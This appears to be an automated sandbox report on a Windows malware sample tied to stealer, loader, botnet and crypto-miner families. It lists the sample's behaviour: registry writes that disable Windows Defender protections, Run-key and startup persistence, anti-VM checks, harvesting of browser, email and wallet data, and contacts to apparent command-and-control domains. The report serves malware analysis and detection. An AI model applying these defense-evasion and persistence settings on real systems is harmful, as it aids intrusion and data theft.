Malware Analysis Report

2025-04-03 09:24

Sample ID 250306-b1yk8svqs9
Target bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
SHA256 bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
Tags
defense_evasion discovery spyware stealer amadey gcleaner healer litehttp stealc systembc xmrig 092155 trump bot dropper evasion execution loader miner persistence trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e

Threat Level: Known bad

The file bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e was found to be: Known bad.

Malicious Activity Summary

Modifies Windows Defender DisableAntiSpyware settings

Xmrig family

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender TamperProtection settings

Amadey

SystemBC

GCleaner

LiteHTTP

Litehttp family

Stealc family

Systembc family

Modifies Windows Defender notification settings

Amadey family

Healer

xmrig

Detects Healer, an antivirus disabler dropper

Gcleaner family

Healer family

Stealc

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks computer location settings

Reads user/profile data of local email clients

Identifies Wine through registry keys

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

.NET Reactor protector

Drops startup file

Windows security modification

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Modifies registry class

Kills process with taskkill

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 01:37

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 01:37

Reported

2025-03-06 01:39

Platform

win7-20241023-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

Identifies Wine through registry keys

defense_evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1212

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | circujitstorm.bet | udp
US | 8.8.8.8:53 | explorebieology.run | udp
US | 8.8.8.8:53 | gadgethgfub.icu | udp
US | 8.8.8.8:53 | moderzysics.top | udp
US | 172.67.189.66:443 | moderzysics.top | tcp

Files

memory/2156-0-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-1-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

memory/2156-2-0x0000000000DF1000-0x0000000000E51000-memory.dmp

memory/2156-3-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-4-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-5-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-6-0x0000000000DF0000-0x000000000110A000-memory.dmp

memory/2156-7-0x0000000000DF1000-0x0000000000E51000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 01:37

Reported

2025-03-06 01:39

Platform

win10v2004-20250217-en

Max time kernel

105s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer, an antivirus disabler dropper

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\nrwu\epug.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A

XMRig Miner payload

miner
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

.NET Reactor protector

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\nrwu\epug.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\nrwu\epug.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
N/A | N/A | C:\ProgramData\nrwu\epug.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe | N/A

Identifies Wine through registry keys

defense_evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\ProgramData\nrwu\epug.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe | N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3d86f4f105.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108970101\\3d86f4f105.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9c1fc92bca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108980101\\9c1fc92bca.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed16c1310c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\ed16c1310c.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\qD7QoBvD\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bdc4900b3c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108950101\\bdc4900b3c.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1fd8abdc9d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108960101\\1fd8abdc9d.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Enumerates processes with tasklist

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
